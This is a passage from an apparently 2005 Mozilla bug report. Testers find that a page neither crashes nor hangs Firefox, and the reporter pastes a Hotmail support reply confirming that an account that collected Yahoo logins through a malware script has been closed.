No crash or hang with the html and css given, and I'm on a 550mhz p3! On IRC I saw several WFM, and your user-agent given with the bug doesn't really help out, although I'm going to assume this is 1.0.6. No crash, no hang, many self-replies...alos, there's a "stop script" dialog now that'll help prevent problems such as these... WFM Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050819 Firefox/1.0+ ID:2005081920
Status: UNCONFIRMED → RESOLVED
Closed: 19 years ago
Resolution: --- → WORKSFORME
|
|
Reporter | |
Updated•19 years ago
|
Status: RESOLVED → VERIFIED
|
|
Reporter | |
Comment 18•19 years ago
|
||
hotmail finally shut down the account that was receiving the emails from the script: === X-SRX: 1001428993 X-Mailer: Microsoft Avondale Mailer Thread-Topic: SRX1001428993ID - YIM virus thread-index: AcWmp0ecI1Yx21kjQGGCzoSABqrUnA== Reply-To: From: "MSN Hotmail Technical Support" <abuse_EN_SY@css.one.microsoft.com> To: "Marc Bejarano" <beej@alum.mit.xxx> Cc: Subject: RE: SRX1001428993ID - YIM virus Date: Sun, 21 Aug 2005 16:23:04 -0700 Message-ID: <03a401c5a6a7$479c9300$4c32fb0a@partners.extranet.microsoft.com> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_03A5_01C5A66C.9B3DBB00" Content-Class: urn:content-classes:message Importance: normal Priority: normal X-MimeOLE: Produced By Microsoft MimeOLE V6.00.3790.326 X-OriginalArrivalTime: 21 Aug 2005 23:23:04.0174 (UTC) FILETIME=[47A608E0:01C5A6A7] X-Spam-Score: 5.084 X-Spam-Level: ***** (5.084) X-Spam-Flag: NO X-Scanned-By: MIMEDefang 2.42 Hello Marc,Thank you for writing back to MSN Hotmail Technical Support. This is Victory and I have read the conversation between you and the other agents regarding the vixi_xlx_zlz_xlx@hotmail.com that spreading malware and collected Yahoo logins. I understand how troublesome this can be.Marc, I have investigated the site and the information you have provided us. As well as the account of the offender and verified that the account is indeed violates our Terms of Use (TOU). In line with this, I have closed the account you reported in accordance with the Hotmail Terms of Use (TOU). It is a strict violation of the TOU for our members to send objectionable material of any kind or nature using our service.You can view our rules and regulations at: http://privacy.msn.com/tou/default.asp Furthermore, if you would like to take actions against the person who sent you the password fishing e-mail, I suggest that you report this matter to the local authorities to further investigate the account. Ask them to contact us directly and provide a subpoena or search warrant, so that we could released to them the information of the account used by the offender. This is in compliance with the Electronic Communications Privacy Act (ECPA).You are valuable at MSN and we look forward to providing you with consistent and effective service. If you have any inquiries, please do not hesitate to write back.Sincerely,Victory B.MSN Hotmail Technical Support <snip quoted thread> ===
You need to log in
before you can comment on or make changes to this bug.
Description
•